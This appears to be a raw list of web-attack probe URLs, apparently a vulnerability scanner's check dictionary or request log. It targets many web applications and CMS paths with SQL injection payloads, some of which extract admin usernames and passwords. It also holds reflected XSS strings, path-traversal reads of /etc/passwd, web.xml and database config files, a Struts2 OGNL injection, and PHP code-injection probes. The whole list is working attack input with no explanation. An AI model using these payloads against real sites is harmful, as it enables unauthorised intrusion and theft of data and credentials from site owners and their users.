/design/tabledesign/tabledelete.jsp?TableName=1'%20AND%20(SELECT%206237%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,0x6F6B6A3A6F6B6A,0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'cPnC'='cPnC
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/developer_tools/webresource_list_left_page.aspx
/devicemanage.php?NodeID=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
/devicemanage.php?NodeID=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
/dianping/claim.php?fid=1&_erp=%60A+LEFT+JOIN+%60qb_dianping_content%60+B+ON+A.id=B.id+procedure+analyse(extractvalue(rand(),concat(0x3a,md5(0x7765627363616e))),1)--+-%23
/djnotice/qydjnotice.jsp?cx=1&entname=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(89)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(57)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'rOd'='rOd
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/docs/Lists.aspx?PinYin=1'%20AND%20CHAR(106)%2bCHAR(58)%3E0%20--
/domcfg.nsf
/domlog.nsf
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/downLoadFile.action?filePath=/WEB-INF/web.xml
/download.action?filename=../../../../../../etc/passwd
/download.php?tfile=%5C..%5C..%5Cconfig.php
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/eassso/WEB-INF/web.xml
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/edoas2/edoas2_test.jsp
/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=-120'%20OR%20(SELECT%204774%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'BLkR'='BLkR&type_id=3&re=0
/emlib4/format/release/aspx/eml_userwh.aspx
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/enterprise/index.php/admin/index
/epaper/admin/advresult.jsp?searchKeys=%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epaper/admin/showlist.jsp?papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411))))a%23
/epaper/admin/showresult.jsp?searchKeys=1'%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epaper/createcd/createcd.jsp?dowhat=createcd&papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epp/LoginServerDo.jsp?userid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&pwd=1
/epp/core/eppquickdesk/eppmsg/eppmsg.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(87)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(79)%7C%7CCHR(97)%7C%7CCHR(67)%7C%7CCHR(75)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/epp/core/eppquickdesk/eppnotice/notice.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(97)%7C%7CCHR(97)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohehe'='ohehe
/epp/core/public/singleplandetail.jsp?pk=1012'%20AND%201234=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(99)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(3640=3640)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(102)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'eye'='eye
/epp/detail/publishinfodetail.jsp?pk_message=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(117)%7C%7CCHR(117)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(98)%7C%7CCHR(98)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohe'='ohe
/epp/html/nodes/upload/SupdocDo.jsp?areaname=1'%20AND%209387=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(108)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9387=9387)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(58)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'msxd'='msxd&supdocname=1&pk_singleplan=1
/epp/html/nodes/upload/supdoc.jsp?pkcorp=1'%20AND%204310=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(106)%7C%7CCHR(109)%7C%7C(SELECT%20(CASE%20WHEN%20(4310=4310)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(111)%7C%7CCHR(58)%7C%7CCHR(109)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'HdRC'='HdRC
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/etc/passwd
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/example/
/examples/
/extras/curltest.php?url=file://curltest.php
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/favicon.ico
/fbyg/a476%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html
/fckeditor/
/fckeditor/editor/dialog/fck_about.html/fckeditor/editor/dialog/fck_about.html
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/file_memo.aspx?file_id=(select%20char(109))
/files/
/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/gallery--p,0,1122%20and%200-0---1.html
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/info/view?kind=0&i9999=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/general/info/view?kind=6&dbpre=k00%20where%201=2%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/ggxxlb.aspx?mc=&xh=&qx=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(86)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&lx=&lxdm=1
/ggxxlb.aspx?mc=&xh=&qx=1&lx=&lxdm=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/grad/admin/domain_logo.php
/group/group.php?id=1%27webscan_draGxn
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/guanli/
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/guestbook_reply.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?ID=-1'%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7,8%23
/hetong/3121436149178/a448%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html
/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/hlp/help.asp?HlpCode=1%27%20AND%208716%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28106%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2b%28SELECT%20%28CASE%20WHEN%20%288716%3D8716%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%28113%29%2bCHAR%28106%29%2bCHAR%28106%29%2bCHAR%2898%29%2bCHAR%28113%29%29%29%20AND%20%27sVMm%27%3D%27sVMm
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/house/ProcManage/WebHouse/HousePic.aspx
/houtai/
/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml
/htdocs/
/html/
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/i/dbmgr/resourcebrowser.do?action=download&file=../conf/jdbc.conf
/i/dbmgr/resourcebrowser.do?action=downloadquery&file=../conf/jdbc.conf
/i/oem/gdyjgrplogin.jsp?opid=1&taskGroup=0&id=%00'%20AND%201398%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281398%3D1398%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27HsUO%27%3D%27HsUO
/icons/
/icons/index
/icons/small/
/icons/small/index
/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/passwd
/img/
/inc/
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/include/
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/include/config.properties
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/include/interface/uidata.php
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/include/thumb.php?x=1&y=/../../../config&dir=config_db.php
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/index.html#/dashboard/file/logstash.json
/index.jsp
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php/Site/article/id/-5724)%20UNION%20ALL%20SELECT%2011,11,11,0x63656461723A66696E643A696969696969,11,11,11,11,11,11,11,11,11%23.html
/index.php/Site/listTpl/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html
/index.php/Site/page/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html
/index.php/abc-abc-abc-$%7B@exit(md5(118741911))%7D/
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/index.php/weblinks-categories?id=just_test
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?a=list_type&c=index&m=link&siteid=1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%23
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?ac=order&at=list
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?ac=search&at=taglist&tagkey=a%2527
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
